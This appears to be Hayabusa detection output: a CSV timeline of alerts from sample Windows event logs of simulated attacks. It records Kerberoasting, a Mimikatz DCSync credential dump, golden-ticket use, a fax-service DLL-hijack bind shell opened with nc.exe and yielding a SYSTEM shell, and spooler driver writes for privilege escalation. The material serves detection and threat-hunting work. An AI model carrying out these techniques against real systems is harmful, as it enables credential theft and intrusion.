2020-08-02 20:37:54.898 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
2020-08-02 20:37:54.999 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: WEC01$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
2020-08-02 20:37:55.142 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
2020-08-02 20:37:55.483 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
2020-08-02 20:37:55.484 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
2020-08-02 20:37:55.625 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.42.22 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
2020-08-02 21:02:34.103 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8c41e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:02:35.117 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8c703,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:02:37.166 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8c741,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:02:37.200 +09:00,rootdc1.offsec.lan,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:02:37.212 +09:00,rootdc1.offsec.lan,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:02:37.213 +09:00,rootdc1.offsec.lan,4662,high,CredAccess,Mimikatz DC Sync,,rules/sigma/builtin/security/win_dcsync.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:02:37.213 +09:00,rootdc1.offsec.lan,4662,critical,CredAccess,Active Directory Replication from Non Machine Account,,rules/sigma/builtin/security/win_ad_replication_non_machine_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:03:03.560 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ROOTDC1$ | Computer: - | IP Addr: fe80::1cae:5aa4:9d8d:106a | LID: 0x11b8cd00,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:03:08.715 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: FS02$ | Computer: - | IP Addr: 10.23.42.18 | LID: 0x11b8d014,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:03:12.993 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8d057,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:04:02.850 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b8dcc1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:04:09.689 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9e9a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:04:09.695 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9e9c0,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:04:09.696 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9e9d3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:04:09.696 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9e9e5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:04:09.816 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x11b9ea1f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4662-DCsync attack using Mimikatz.evtx
2020-08-02 21:26:03.702 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:26:11.437 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:26:20.424 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:27:02.387 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:27:19.056 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::1 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:27:19.742 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::1 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:31:20.566 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:31:20.567 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:31:20.925 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: FS02$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-02 21:31:20.926 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: gold-non-existing-user@offsec.lan | Svc: MSSQL01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Golden ticket issued.evtx
2020-08-03 01:24:07.551 +09:00,MSEDGEWIN10,7,high,Persis | Evas,Fax Service DLL Search Order Hijack,,rules/sigma/image_load/sysmon_susp_fax_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-03 01:24:07.558 +09:00,MSEDGEWIN10,5145,high,LatMov,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/PrivEsc_NetSvc_SessionToken_Retrival_via_localSMB_Auth_5145.evtx
2020-08-03 01:24:07.559 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\pipey | Process: System | PID: 4 | PGUID: 747F3D96-E303-5F26-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-03 01:24:07.561 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\fxssvc.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 5252 | Src PGUID: 747F3D96-E8A7-5F26-0000-0010230D1A00 | Tgt PID: 864 | Tgt PGUID: 747F3D96-E309-5F26-0000-001021BC0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-03 01:24:07.561 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\fxssvc.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 5252 | Src PGUID: 747F3D96-E8A7-5F26-0000-0010230D1A00 | Tgt PID: 820 | Tgt PGUID: 747F3D96-E309-5F26-0000-0010137B0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-03 01:24:08.403 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:49674 (MSEDGEWIN10) | Dst: 0:0:0:0:0:0:0:1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-E303-5F26-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-03 01:24:08.403 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 0:0:0:0:0:0:0:1:49674 (MSEDGEWIN10) | Dst: 0:0:0:0:0:0:0:1:445 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 747F3D96-E303-5F26-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-03 01:24:25.728 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49675 (MSEDGEWIN10) | Dst: 127.0.0.1:9299 (MSEDGEWIN10) | User: MSEDGEWIN10\IEUser | Process: C:\Users\IEUser\Tools\Misc\nc.exe | PID: 7836 | PGUID: 747F3D96-E8B8-5F26-0000-00100AA71A00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-03 01:24:25.728 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 127.0.0.1:49675 (MSEDGEWIN10) | Dst: 127.0.0.1:9299 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\FXSSVC.exe | PID: 5252 | PGUID: 747F3D96-E8A7-5F26-0000-0010230D1A00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-03 01:24:26.809 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""c:\windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0x3e7 | PID: 8104 | PGUID: 747F3D96-E8BA-5F26-0000-001035BE1A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""c:\windows\system32\cmd.exe"" | LID: 0x3e7 | PID: 588 | PGUID: 747F3D96-E8BC-5F26-0000-0010F7C41A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-03 01:24:28.640 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/faxhell_sysmon_7_1_18_3_bindshell_dllhijack.evtx
2020-08-12 22:04:27.419 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\Temp\__SKIP_1E14 | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.454 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\{A6F2FD48-5F14-4B5F-ACC3-8DE2ACD8E384} | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.551 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\Old | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.551 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.551 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.551 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\UNIDRV.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\UNIDRVUI.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTY.GPD | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\UNIDRV.HLP | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTYRES.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.562 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTY.INI | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTY.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTYUI.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\TTYUI.HLP | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.563 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\UNIRES.DLL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.602 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\STDNAMES.GPD | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
2020-08-12 22:04:27.602 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\3\New\STDDTYPE.GDL | Process: C:\Windows\System32\spoolsv.exe | PID: 7700 | PGUID: 747F3D96-E8AB-5F33-0000-001057D13900,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolsv_spl_file_write_sysmon11.evtx
